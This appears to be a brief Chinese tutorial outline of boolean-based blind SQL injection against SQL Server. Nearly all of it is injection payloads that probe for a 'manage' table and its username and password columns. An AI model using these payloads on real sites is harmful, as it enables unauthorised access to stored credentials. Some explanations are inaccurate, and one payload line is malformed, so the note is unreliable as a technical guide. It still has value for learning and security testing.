目录:
布尔盲注
总结:
布尔盲注就是靠逐个猜测与尝试弱口令的的方法,有报错的就是猜错了,没报错就对了。
第一步 判断注入
-
and 1=1
-
and 1=2
第二步 猜解列数
-
order by 1 #返回正确
-
order by 2 #返回正确
-
order by 3 #抛出错误
第三步 猜数据库名,表名:
-
and (select count(*) from sysobjects)>0 #确定SQLSERVER数据库
-
and (select count(*) from manage)>0 #确定数据表
-
and (select count(*) from manage)=1,2,3,4,5 #确定长度
第四步 猜解字段
-
and exists(select username from manage),#返回正常,字段名正确
-
and exists(select password from manage), #返回正常,字段名正确
第五步 判断字段长度
-
and exists(select id from manage where ID=1) #判断ID=1是否存在
<